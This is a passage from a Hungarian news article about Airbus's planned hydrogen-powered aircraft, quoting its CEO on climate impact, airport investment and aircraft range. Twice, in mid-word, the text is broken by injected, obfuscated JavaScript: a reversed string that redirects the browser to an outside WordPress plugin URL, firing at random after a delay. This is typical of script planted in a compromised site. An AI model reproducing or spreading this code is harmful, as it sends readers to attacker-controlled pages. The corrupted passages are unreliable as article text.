Ez egy történelmi pillanat az egész kereskedelmi repülési ágazat számára, és vezető szerepet kívánunk játszani ebben az átmenetben – jelentette ki Guillaume Faury, az Airbus vezérigazgatója. Meggyőződésem, hogy a bemutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, hidrogénhajtású modell jelentősen csökkentheti a légi közlekedés éghajlatra gyakorolt hatását. Hozzátette, az új repülőgépek üzembe helyezése előtt a repülőtereknek nagy összegű beruházásokra lesz szükségük, a hidrogénnel való tankolás miatt – jegyezte meg. A három repülőgép közül az egyik turbólégcsavaros szerkezetű, és több mint 3000 kilométer távolságra lesz képes, és akár 200 utast is szállíthat. A második bemutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott repülő légcsavaros szerkezetet kap, ami rövid távok átszelésére lesz alkalmas. Az első kettőtől…
A cikk folytatódik: http://itmozaik.co.hu/hirek/2020/10/01/johetnek-a-hidrogennel-mukodo-repulogepek.html
- Hirdetés -